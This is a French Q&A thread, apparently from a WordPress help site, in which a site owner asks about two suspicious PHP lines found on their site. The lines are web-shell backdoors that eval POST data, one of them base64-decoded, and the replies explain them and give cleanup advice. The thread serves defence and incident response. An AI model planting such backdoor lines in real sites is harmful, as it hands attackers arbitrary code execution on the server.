web-dev-qa-db-fra.com

Dossiers suspects

Bonjour, j'ai trouvé deux fichiers suspects sur mon site:

  1. Le premier dans mon thème (404.php), avec cette ligne ajoutée

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

  2. La seconde dans /wp-admin/ appelée wp-class.php.

    La seule ligne disponible était: <?eval($_POST[joao]);?>

Quelqu'un peut-il me dire ce que cela fait et quelles mesures dois-je prendre?

1
qaedus
  1. Lorsque quelqu'un envoie une demande POST avec une variable php et une valeur codée en base 64 qui est le code PHP après l'avoir décodé, ce code PHP s'exécutera avec les autorisations. de tous vos propres fichiers PHP. L'attaquant peut lire tout le contenu de la base de données, créer de nouveaux utilisateurs, télécharger des fichiers…

  2. Le deuxième code fait la même chose, sans encoder PHP.

Les deux injections sont plutôt primitives; ils semblent presque comme si devrait être trouvés pour que vous vous sentiez en sécurité lorsque vous les retirez.

Il est très probable que ces extraits ne sont pas les seuls problèmes. L’attaquant a probablement utilisé son nouveau site et ajouté des fichiers. Lire Vérifier que j'ai complètement supprimé un piratage WordPress? et suivre toutes les suggestions mentionnées ici.

Trouvez la porte arrière. Lisez vos fichiers journaux s’ils ne sont pas déjà compromis.

3
fuxia

Ces lignes de code sont presque sûrement malveillantes. Pour empêcher le webmaster de rechercher des chaînes, le contenu malveillant est souvent masqué dans un format codé, tel que base64.

D'après mon expérience, la version la plus courante de cette attaque génère une iframe masquée qui charge une URL externe malveillante (qui peut être utilisée à plusieurs fins).

Analysez votre site avec Quttera (en interne) et Sucuri (en externe) et voyez si vous pouvez identifier et supprimer toutes les instances de l'attaque.

0
Orun